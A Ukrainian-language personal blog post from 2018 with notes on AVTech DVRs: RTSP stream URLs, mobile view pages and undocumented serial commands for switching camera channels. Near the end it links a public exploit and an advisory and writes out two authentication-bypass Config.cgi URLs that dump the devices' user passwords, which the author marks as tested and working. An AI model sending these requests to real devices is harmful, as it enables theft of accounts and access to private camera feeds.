29 грудня 2018 р.

AVTECH DVR HIDDEN COMMANDS

Хотів для себе накидати нотатки як підключатися до відеореєстратора фірми AVTech.
А вийшло трохи більше.
А ще, головна мета знайти як отримати повідомлення про подію з відеореєстратора що потім зчитати фрагмент цього запису. Без використання рідного програмного забезпечення.

URLS:

Перегляд за допомогою VLC player без звуку:
rtsp://DVR_URL/live/mpeg4
rtsp://DVR_URL/live/h264

Перегляд зі звуком:
rtsp://DVR_URL/live/mpeg4_ulaw
rtsp://DVR_URL/live/h264_ulaw


With ch.:
rtsp://DVR_URL/live/h264/ch0 - MAIN
rtsp://DVR_URL/live/h264/ch1 .. ch8 ...   by ch.


INFORMATION:

FOR ALL : http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability

MOBILE VIEW:

http://DVR_URL/nobody/mobile480.htm?Login=Captcha - main view
http://DVR_URL/nobody/m2.htm?ch=1&rf=3&dep=1  - ch1

Change main view ch:

http://DVR_URL/cgi-bin/user/Serial.cgi?action=write&device=MASTER&data=02 3C 00 00 23&sid=0.22579487226719663 - ch6

data=02 3E 00 00 23 - ch8
data=02 3D 00 00 23 - ch7
data=02 3C 00 00 23 - ch6
data=02 3B 00 00 23 - ch5
data=02 3A 00 00 23 - ch4
data=02 39 00 00 23 - ch3
data=02 38 00 00 23 - ch2
data=02 37 00 00 23 - ch1

data=02 1A 00 00 23 - cut1-4 and next cut4-8
data=02 19 00 00 23 - cut9


А тут знайшов про баги не закриті у прошивках.


AVTECH EXPLOITS: https://www.exploit-db.com/exploits/40500

GET USERS PASSWORD!!!! :
http://DVR_URL/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
http://DVR_URL/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*


TESTED !!!! WORKS, CRAZY


https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities


Немає коментарів:


Коли забув ти рідну мову, біднієш духом ти щодня...
When you forgot your native language you would become a poor at spirit every day ...

Д.Білоус / D.Bilous
Рабів до раю не пускають. Будь вільним!

ipv6 ready